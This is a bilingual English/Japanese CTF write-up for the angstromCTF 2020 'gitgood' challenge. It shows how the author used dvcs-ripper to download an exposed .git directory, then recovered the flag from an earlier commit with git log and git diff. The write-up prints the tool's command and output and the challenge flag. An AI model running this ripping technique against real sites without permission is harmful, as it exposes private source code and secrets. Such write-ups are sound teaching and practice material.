https://ctftime.org/task/10758
日本語は下
Writeup in English
Required Knowledge
- Git
Writeup
This only comes out. Even if you look at the HTTP response, there is only information about what you are doing with Express + nginx. And because it's index.html, we can't find anything strange.
Return to the question sentence.
Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.
The writer use the word "git". Is there a way to get git's data?
【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
I found!
kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
I use this, but recently I can build the environment with docker. (Great…)
docker run -it k0st/alpine-dvcs-ripper /bin/bash bash-4.3$
Ready for use with this. Execute the command described in the document.
bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/ [i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/ [i] Auto-detecting 404 as 200 with 3 requests [i] Getting correct 404 responses [i] Using session name: zqWbzkQI [d] found COMMIT_EDITMSG [d] found config [d] found description [d] found HEAD [d] found index [!] Not found for packed-refs: 404 Not Found [!] Not found for objects/info/alternates: 404 Not Found [!] Not found for info/grafts: 404 Not Found [d] found logs/HEAD [d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5 [d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35 [d] found refs/heads/master [!] found info file for packs, trying to process them: objects/info/packs [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree [d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7 [d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4 [d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70 [d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a [d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138 [d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb [d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79 [d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3 [i] Got items with git fsck: 8, Items fetched: 8 [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. [d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b [i] Got items with git fsck: 1, Items fetched: 1 [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. [i] Got items with git fsck: 0, Items fetched: 0 [!] No more items to fetch. That's it! bash-4.3$ ls index.html index.js package-lock.json package.json thisistheflag.txt
Oh, amazing. I was really able to git clone.
bash-4.3$ cat thisistheflag.txt There used to be a flag here...
OK. See logs.
bash-4.3$ git log [[33mcommit e975d678f209da09fff763cd297a6ed8dd77bb35[[m Author: aplet123 <noneof@your.business> Date: Sat Mar 7 16:27:44 2020 +0000 Initial commit [[33mcommit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5[[m Author: aplet123 <noneof@your.business> Date: Sat Mar 7 16:27:24 2020 +0000 haha I lied this is the actual initial commit
The latest comment is Initial Commit
, but there is a commit before that.
I guess it is a situation in that the commit message is modified.
bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5 [[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m [[1mindex 0f52598..247c9d4 100644[[m [[1m--- a/thisistheflag.txt[[m [[1m+++ b/thisistheflag.txt[[m [[36m@@ -1,3 +1 @@[[m [[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m [[31m-[[m [[31m-btw this isn't the actual git server[[m [[32m+[[m[[32mThere used to be a flag here...[[m
I feel garbled, but the flag comes out. Probably the color designation has come out.
以下、日本語
前提知識
- Gitの知識
解説
これが出るだけ。 HTTPレスポンスを見てもExpress+nginxでやってんのね位の情報しかない。 しかも、index.htmlなので、変なところも見当たらない。
問題文に立ち返ってみる。
Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.
やたらgitが押されている。 もしかして、gitのデータ抜く方法ある?
【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
あるやんけ!
.gitとかをハックするのね。なるほど。
kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
これを使うのだが、昨今はdockerで環境構築ができてしまう。(素晴らしい…)
docker run -it k0st/alpine-dvcs-ripper /bin/bash bash-4.3$
これで使用準備完了(すげぇ、現代の力感)
ドキュメントに書いてあるコマンドを実行する。
bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/ [i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/ [i] Auto-detecting 404 as 200 with 3 requests [i] Getting correct 404 responses [i] Using session name: zqWbzkQI [d] found COMMIT_EDITMSG [d] found config [d] found description [d] found HEAD [d] found index [!] Not found for packed-refs: 404 Not Found [!] Not found for objects/info/alternates: 404 Not Found [!] Not found for info/grafts: 404 Not Found [d] found logs/HEAD [d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5 [d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35 [d] found refs/heads/master [!] found info file for packs, trying to process them: objects/info/packs [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree [d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7 [d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4 [d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70 [d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a [d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138 [d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb [d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79 [d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3 [i] Got items with git fsck: 8, Items fetched: 8 [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. [d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b [i] Got items with git fsck: 1, Items fetched: 1 [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. [i] Got items with git fsck: 0, Items fetched: 0 [!] No more items to fetch. That's it! bash-4.3$ ls index.html index.js package-lock.json package.json thisistheflag.txt
おー、すごい。ほんとにgit cloneできた。
bash-4.3$ cat thisistheflag.txt There used to be a flag here...
ほーん。ログ見るか。
bash-4.3$ git log [[33mcommit e975d678f209da09fff763cd297a6ed8dd77bb35[[m Author: aplet123 <noneof@your.business> Date: Sat Mar 7 16:27:44 2020 +0000 Initial commit [[33mcommit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5[[m Author: aplet123 <noneof@your.business> Date: Sat Mar 7 16:27:24 2020 +0000 haha I lied this is the actual initial commit
最新がInitial Commit
となっているが、その前にコミットがある。
コミットメッセージ修正したって設定なんだろうなぁ
bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5 [[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m [[1mindex 0f52598..247c9d4 100644[[m [[1m--- a/thisistheflag.txt[[m [[1m+++ b/thisistheflag.txt[[m [[36m@@ -1,3 +1 @@[[m [[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m [[31m-[[m [[31m-btw this isn't the actual git server[[m [[32m+[[m[[32mThere used to be a flag here...[[m
文字化けしてる感があるけど、フラグが出てくる。 たぶん色指定が出てきちゃってるんだろうけど、せっかくならちゃんと見たいな。 何で見ればいいだろう